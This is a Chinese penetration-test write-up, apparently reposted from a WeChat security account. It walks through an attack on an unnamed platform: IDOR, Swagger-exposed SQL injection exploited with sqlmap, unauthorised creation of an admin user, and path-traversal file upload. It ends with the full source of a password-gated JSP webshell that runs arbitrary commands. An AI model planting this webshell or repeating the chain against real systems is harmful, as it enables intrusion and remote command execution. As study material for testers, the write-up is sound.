前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >某平台的一次简单渗透测试记录

某平台的一次简单渗透测试记录

作者头像
潇湘信安
发布2021-12-02 14:44:41
3550
发布2021-12-02 14:44:41
举报
文章被收录于专栏:潇湘信安潇湘信安

0x01 目标

某平台系统

0x02 流程

图片
图片

0x03 测试

拿到站点后先做信息收集,扫描目录看看有无敏感信息

图片
图片

寥寥无几,没有任何信息,启动burpsuite打开网站走一遍流程。

在创建目标处存在图片上传接口,上传shell试试。

图片
图片

没有任何过滤,可直接上传,但当前目录不解析,猜测projectKey控制上传路径

图片
图片

可跨目录上传,但当前/webapp/test/uploadFile/路径非网站根目录,爆破了常见网站目录但没有一个是正确的解析shell的,先放着后续是否能找到网站根路径然后再跨目录上传。

越权

在浏览到某个页面中看到了一处链接/detail.shtml?key={{id}},拿出来浏览器中访问,测测是否存在越权或者SQL注入。

代码语言:javascript
复制
http://www.target.net/detail.shtml?key=1
图片
图片

随便给个数值访问测试,发现只存在水平越权,不存在注入。

代码语言:javascript
复制
http://www.target.net/detail.shtml?key=
图片
图片

去掉参数直接访问,却弹出来了报错页面。

图片
图片

该站点使用的是spring框架,重新使用spring相关接口路由字典扫一遍,还意外扫到了druid登录页面,但并不存在未授权访问和弱口令的漏洞,继续看swagger。

图片
图片

在swagger中找到了一处注入和敏感信息泄露。

敏感信息泄露

图片
图片

根据URL猜参数名teamId,查看到所有的团队信息。

图片
图片

这里也是一处越权。

sql注入

图片
图片

同样猜参数名,未做任何过滤,单引号报错,直接上sqlmap一把梭。

图片
图片

越权添加用户

但翻了翻数据库并未找到管理员账号密码,不过找到了网站接口配置信息,将接口导出然后放到burpsuite里面跑

图片
图片

成功找到了越权添加/编辑用户接口,直接添加新管理员账号并登录。

图片
图片

任意文件上传

回到刚才文件上传处,通过sql注入报错页面我们找到了真实路径/usr/local/test/webapps/ROOT/WEB-INF/classes/mappings/base-mapper.xml],修改projectKey值,用../../../../跨目录上传shell

图片
图片

0x04 疑问

在最后上传shell处,尝试了冰蝎、哥斯拉的马都无法正常解析,后来更换了带密码回显的jsp马才成功,请问这是什么原因?

代码语言:javascript
复制
<%
    if("admin".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-11-17,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 潇湘信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x01 目标
  • 越权
  • 敏感信息泄露
  • sql注入
  • 越权添加用户
  • 任意文件上传
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档